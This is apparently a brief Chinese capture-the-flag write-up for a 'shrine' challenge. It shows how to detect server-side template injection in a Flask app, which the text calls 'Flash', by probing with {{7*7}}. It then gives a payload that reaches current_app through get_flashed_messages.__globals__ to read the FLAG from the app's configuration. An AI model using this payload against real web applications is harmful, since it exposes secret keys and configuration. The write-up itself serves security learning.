打開實驗環境:
根據提示:shrine 可能存在Flash框架,SSTI模板注入漏洞
使用獨特語法探測漏洞: http://220.249.52.133:41635/shrine/{{7*7}}
http://220.249.52.133:41635/shrine/hello{{7*8}}
看到用戶的輸入被當做代碼執行了;
構造pyload:http://220.249.52.133:41635/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
Flash模板注入格式:{{1+2}} //特定情況下可以當做代碼執行
get_flashed_messages //字面意思,獲取內容,就是取值,后面跟的就是要取得值
current_app //設計模式中代理設計的代理對象,指向flask核心對象和reques的請求類
詳細解釋: Flash核心機制:current_app、flash框架(六)、SSTI模板注入